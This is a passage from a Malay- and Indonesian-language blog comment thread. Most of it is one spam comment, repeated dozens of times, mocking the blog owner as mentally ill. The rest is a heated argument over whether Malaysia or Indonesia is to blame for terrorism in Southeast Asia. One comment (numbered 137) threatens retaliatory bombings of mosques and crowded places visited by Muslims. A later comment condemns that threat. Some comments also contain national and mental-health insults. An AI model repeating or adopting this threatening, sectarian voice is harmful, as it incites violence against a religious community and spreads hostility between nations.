    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  117. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  118. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  119. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  120. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  121. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  122. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  123. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  124. @Eva,
    Apa kena mengena terrorists dengan malaysia? Cuma 2 ke 3 org rakyat malaysia yg kawin dengan indon dan tinggal kat indon kendian jadi pengganas korang tuduh malaysia pengganas?

    Hello2 mbak, indonesia tu yg jadi pusat rekrutment dan latihan pengganas se asia tenggara, tau tak? Kalau tak tau pergi ke encylopedia britania dan search ok.

    Pemerintah indonesia jangan duduk memerintah je kenalah buat kerja, seriouslah sikit tangani masalah keganasan. kenapa dah bertahun tahun masih tak dapat tangkap pengganas2 ni semua? Tuhari pengganas singapore lari, polis malaysia dah dapat tangkap. kalau dia lari masuk indonesia, tentu sampai sekarang tak dapat lagi. Polis dgn pemerintah indonesia kenalah serious nak tangkap diorg ni jangan asyik menuding je.

    seme kelemahan negara korang, kegagalan negara korang kau tuding jari kat malaysia, sampai bila korang nak baiki diri korang kalau asyik salahkan org lain? cubalah belajar dari kelemahan dan kegagalan sendiri oiii.

    Lagi satu mbak, orang islam pun marah ngan pengganas ni bukan kritian jer. orang islam pun ada yg matilah.

    Eh mbak eva ni salah channel ke aku yg salah channel huh? Sorry geram betul.....

    ReplyDelete
  125. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  126. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  127. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  128. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  129. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  130. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  131. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  132. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  133. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  134. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  135. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  136. @Eva,
    Apa kena mengena terrorists dengan malaysia? Cuma 2 ke 3 org rakyat malaysia yg kawin dengan indon dan tinggal kat indon kendian jadi pengganas korang tuduh malaysia pengganas?

    Hello2 mbak, indonesia tu yg jadi pusat rekrutment dan latihan pengganas se asia tenggara, tau tak? Kalau tak tau pergi ke encylopedia britania dan search ok.

    Pemerintah indonesia jangan duduk memerintah je kenalah buat kerja, seriouslah sikit tangani masalah keganasan. kenapa dah bertahun tahun masih tak dapat tangkap pengganas2 ni semua? Tuhari pengganas singapore lari, polis malaysia dah dapat tangkap. kalau dia lari masuk indonesia, tentu sampai sekarang tak dapat lagi. Polis dgn pemerintah indonesia kenalah serious nak tangkap diorg ni jangan asyik menuding je.

    seme kelemahan negara korang, kegagalan negara korang kau tuding jari kat malaysia, sampai bila korang nak baiki diri korang kalau asyik salahkan org lain? cubalah belajar dari kelemahan dan kegagalan sendiri oiii.

    Lagi satu mbak, orang islam pun marah ngan pengganas ni bukan kritian jer. orang islam pun ada yg matilah.

    Eh mbak eva ni salah channel ke aku yg salah channel huh? Sorry geram betul.....

    ReplyDelete
  137. Kami umat Christiani sdh jenuh menghadapi teror bom dari teroris krn korban nya melulu umat kami doang.
    KESABARAN ITU ADA BATASNYA !
    Jika kami hendak bergerilya meledakkan bom di mesjid2 atau tempat2 keramaian yg umum dikunjungi oleh umat islam kami sanggup aja, tapi kami masih bersabar.
    Bukan anda saja yg bisa mengirim bom tapi kami juga bisa meledakkan bom yg lebih dahsyat.
    Tapi kenapa pengebom teroris Nurdin M Top dll selalu warga bangsa Malaysia ? KESABARAN ADA BATASNYA. JGN SAMPAI KAMI UMAT KRISTIANI MENGIRIM BOM KE MESJID2 & TEMPAT KERAMAIAN UMAT MUSLIM YG RAMAI DIKUNJUNGI OLEH UMAT ISLAM MALAYSIA.

    ReplyDelete
  138. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  139. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  140. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  141. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  142. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  143. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  144. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  145. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  146. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  147. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  148. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  149. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  150. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  151. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  152. Eva,
    kalau kau ingat kami dimalaysia bersorak gembira saat jiran kami masih berkabung, KAU SILAP BESAR! Kami amat merasai, kerana sanak saudara dan sahabat handai kami adalah rakyat Indonesia sendiri! Kami mengutuk sekeras-kerasnya perbuatan hina itu. Islam tidak menyuruh umatnya berbunuhan, itu kau mesti ingat. jgn kerana pembunuhnya Islam kau telah menyalahkan ugamanya!!

    Kau menuduh 'Otak pengebom konon justru disetir oleh warga negara & bangsa Muslim Malaysia'. Tuduhan itu amat berat sekali kerana belum terbukti lagi. Kau sebagai seorang kristian yg baik, tidak akan menuduh sewenangnya kerna bukan ajaranmu sebegitu.

    'Amaran' kau supaya kami beingat 'JGN SAMPAI KAMI ORGANISASI SALIB DUNIA BERBALAS DENDAM, MAKA AKAN RUNYAM MESJID2 DIDUNIA !' adalah bertentangan dengan ugama kristian sendiri kerna aku tahu kristian juga tidak menyuruh penganutnya berbunuhan.

    Jgan sampai kau terbawa-bawa dgn emosi kau ... itu kau harus ingat dan pegang!

    ReplyDelete
  153. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  154. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  155. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  156. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  157. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  158. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  159. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  160. @Eva, oiiii nenek kau salah channellah oiii.... meroyan tak tentu pasal. pegi cari channel lain.

    ReplyDelete
  161. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  162. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  163. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  164. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  165. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  166. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  167. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  168. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  169. UNTUK PENGETAHUAN SEMWANYA

